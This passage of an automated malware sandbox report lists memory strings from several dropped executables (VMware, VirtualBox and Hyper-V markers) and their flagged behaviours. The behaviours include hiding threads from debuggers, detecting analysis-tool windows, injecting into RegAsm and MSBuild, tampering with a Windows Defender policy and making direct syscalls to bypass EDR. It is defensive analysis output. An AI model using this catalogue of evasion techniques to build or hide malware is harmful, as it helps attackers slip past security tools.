Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: $Windows 8.1 Microsoft Hyper-V Server
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2414122665.0000000005E7D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}E
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: ,Windows 2012 Server Standard without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2413089730.0000000005FDD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}A
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2012 Microsoft Hyper-V Server
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2549795931.0000000001266000.00000004.00000020.00020000.00000000.sdmp, ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3136763184.00000000018A8000.00000004.00000020.00020000.00000000.sdmp, ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3136763184.00000000018EC000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2540342471.00000000014DB000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2540342471.0000000001514000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3132751366.0000000000E70000.00000004.00000020.00020000.00000000.sdmp, softjenimmp3converter.exe, 00000031.00000002.3123922787.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, softjenimmp3converter.exe, 00000031.00000002.3123922787.00000000008DF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 8 Essential Server Solutions without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 10 Essential Server Solutions without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 10 Server Standard without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000003.2137721811.00000000018BD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: %Windows 2016 Microsoft Hyper-V Server
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: +Windows 8.1 Server Standard without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2016 Server Standard without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
Source: RegAsm.exe, 00000017.00000002.3132250995.0000000000DB5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 11 Server Enterprise without Hyper-V (core)
Source: svchost.exe, 00000003.00000002.2891186635.000001AC23640000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 11 Server Datacenter without Hyper-V (core)
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2413089730.0000000005FDD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}R
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2549795931.000000000124B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}K
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2413089730.0000000005FF5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_B23F6320
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2540342471.0000000001480000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 5Windows 11 Essential Server Solutions without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2016 Server Standard without Hyper-V (core)
Source: svchost.exe, 00000003.00000002.2882896002.000001AC23633000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000&00000
Source: svchost.exe, 00000003.00000003.1624757675.000001AC23644000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 8 Server Standard without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: xVBoxService.exe
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
Source: H14SDf_AWcPvvQK5Xx97sISX.exe, 00000010.00000002.3137071577.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2193008587.0000000002F20000.00000004.00001000.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2195905601.0000000002F20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: \SystemRoot\system32\ntkrnlmp.exeSDT\VBOX__
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: *Windows 11 Server Standard without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: ,Windows 2016 Server Standard without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2012 Server Standard without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
Source: ifM1E2HUtOYe96efnF4a_sDH.exe, 00000011.00000002.3136449020.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: VBoxService.exe
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2184193605.0000000002F20000.00000004.00001000.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2185298361.0000000002F20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: \SystemRoot\system32\ntkrnlp.exeSDT\VBOX__
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 8.1 Server Standard without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: *Windows 10 Server Standard without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 1Windows 11 Server Standard without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
Source: svchost.exe, 00000003.00000002.2868341771.000001AC23602000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: VMWare
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3136763184.000000000184E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: #Windows 11 Microsoft Hyper-V Server

Source: C:\Users\user\Desktop\WlCIinu0yp.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe	Process queried: DebugPort
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Process queried: DebugPort
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Process queried: DebugPort
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Process queried: DebugObjectHandle

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe

Code function: 7_2_00418BB0 LoadLibraryA,GetProcAddress,

7_2_00418BB0

Contains functionality to read the PEB

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_004160B0 mov ecx, dword ptr fs:[00000030h]	7_2_004160B0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0045D9F0 mov eax, dword ptr fs:[00000030h]	7_2_0045D9F0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0045D9F0 mov eax, dword ptr fs:[00000030h]	7_2_0045D9F0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0041AB90 mov eax, dword ptr fs:[00000030h]	7_2_0041AB90
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_004146B0 mov eax, dword ptr fs:[00000030h]	7_2_004146B0

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe

Code function: 7_2_004094C0 OutputDebugStringA,GetModuleHandleA,GetProcAddress,GetProcessHeap,RtlAllocateHeap,HeapFree,RtlAllocateHeap,HeapFree,

7_2_004094C0

Enables debug privileges

Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process token adjusted: Debug

Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Disables Windows Defender (deletes autostart)

Source: C:\Users\user\Desktop\WlCIinu0yp.exe

Registry value deleted: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B9FEE511-3092-40D0-A7E3-1981640294CA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender DisableAntiSpyware

Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	NtProtectVirtualMemory: Direct from: 0x140FC862F
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	NtProtectVirtualMemory: Direct from: 0x14101446D
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	NtOpenFile: Direct from: 0x140FBB569
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	NtSetInformationThread: Indirect: 0x1406B2FDA	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	NtProtectVirtualMemory: Direct from: 0x141036FB5
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	NtProtectVirtualMemory: Direct from: 0x140FE889D
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	NtQueryInformationProcess: Indirect: 0x1406A0768	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	NtProtectVirtualMemory: Direct from: 0x14102BFF1
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	NtProtectVirtualMemory: Indirect: 0x140F595B5
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	NtQueryInformationProcess: Indirect: 0x1406A0615	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	NtUnmapViewOfSection: Direct from: 0x141037F5D
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	NtQuerySystemInformation: Indirect: 0x140648961	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	NtProtectVirtualMemory: Direct from: 0x14100CB88
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	NtClose: Direct from: 0x141019C6D
